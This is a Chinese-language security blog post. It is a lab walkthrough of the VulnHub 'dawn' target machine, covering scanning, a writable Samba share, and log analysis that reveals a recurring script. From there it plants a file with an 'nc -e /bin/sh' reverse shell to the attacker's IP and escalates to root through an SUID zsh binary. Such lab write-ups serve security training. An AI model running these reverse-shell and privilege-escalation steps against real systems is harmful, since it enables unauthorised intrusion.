靶机实战系列之dawn靶机

文摘   科技   2024-10-29 09:17   北京  



声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 


靶机地址:

https://download.vulnhub.com/sunset/dawn.zip


内容简介:

主机发现

端口扫描

信息收集

SAMBA漏洞

任意文件上传

日志信息泄漏

调度任务

密码爆破

提权

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l


1.2 端口扫描

nmap -p-  192.168.144.138


1.3 信息搜集

nmap -p80,139,445,3306 -sV  -A   192.168.144.138  


Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-02 02:37 EDTNmap scan report for 192.168.144.138Host is up (0.0012s latency).
PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.38 ((Debian))|_http-server-header: Apache/2.4.38 (Debian)|_http-title: Site doesn't have a title (text/html).139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1| mysql-info: | Protocol: 10| Version: 5.5.5-10.3.15-MariaDB-1| Thread ID: 14| Capabilities flags: 63486| Some Capabilities: Support41Auth, SupportsCompression, SupportsTransactions, ConnectWithDatabase, IgnoreSigpipes, FoundRows, ODBCClient, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults| Status: Autocommit| Salt: nZY0"VmCFt5L[hu7M^o6|_ Auth Plugin Name: mysql_native_passwordMAC Address: 08:00:27:BE:C7:00 (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: Host: DAWN
Host script results:|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-time: | date: 2022-11-02T06:37:55|_ start_date: N/A|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)| smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required| smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian)| Computer name: dawn| NetBIOS computer name: DAWN\x00| Domain name: dawn| FQDN: dawn.dawn|_ System time: 2022-11-02T02:37:55-04:00
TRACEROUTEHOP RTT ADDRESS1 1.21 ms 192.168.144.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 20.66 seconds

开启了139,445端口存在Samba smbd


1.4 Samba漏洞


smbclient -L  \\\\192.168.144.138 

smbclient    \\\\192.168.144.138\\ITDEPThelp

可以使用PUT方法写入文件 

echo 1111 > a.txtput a.txtls


写入任意文件  


1.5 日志文件分析

dirsearch -u    http://192.168.144.138/

http://192.168.144.138/logs/

http://192.168.144.138/logs/management.log

你也许会好奇为什么没有日志   这个靶机需要等到 晚上 10点到11点 日志才会收集,如果没有日志的话,休息一天把 ,等明天就会有了 ,包括突破边界也是同样的!!!!!!

下载下来分析日志文件

使用pspy64工具抓取了正在运行的服务

找到根目录 /var/www/html

找到关键点ITDEPT在445服务也存在这样的文件夹执行web-control脚本

然后改777权限

发现 该脚本 循环往复    故  可以445服务里面写一个以该脚本名字命名,写入  反弹代码  等待它  循环执行!!!!!!!!!!!!!
grep  "/home/dawn/ITDEPT/"  management.log

伪造product-control文件往里面写入反弹shell代码,等待循环执行。



1.6 突破边界


smbclient    \\\\192.168.144.138\\ITDEPT
vim product-control //创建文件//写入nc 反弹#!/bin/bashnc -e /bin/sh 192.168.144.247 4444
put product-control // 稍微等待一会nc -lvnp 4444成功!!!python -c "import pty;pty.spawn('/bin/bash')" //终端升级



1.7 权限提升(suid提权)


find / -type f -perm -u=s -ls 2>/dev/null


发现 以 root权限 执行的   zsh   ,接下来 就简单了 直接执行 zsh

成功




注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"





点击上方公众号
关注我们








往期精彩

Armitage|MSF图形界面神器

原创|Searchall3.5.10敏感信息搜索工具

快看!渗透测试工具库!







1、公众号后台回复:搜索大法,获取searchall工具下载链接。

2、公众号后台回复:靶场,获取靶场工具网盘下载链接。

3、公众号后台回复:webshell,获取webshell下载链接。

4、公众号后台回复:验证码,获取验证码工具下载链接。

5.公众号后台回复:应急响应,获取应急响应网盘下载链接。

6.公众号后台回复:CS,获取CS渗透工具包网盘下载链接。

7.公众号点菜单栏"工具合集",后台回复""即可获取!

嗨嗨安全
提供网络安全资料与工具,分享攻防实战经验和思路。
 最新文章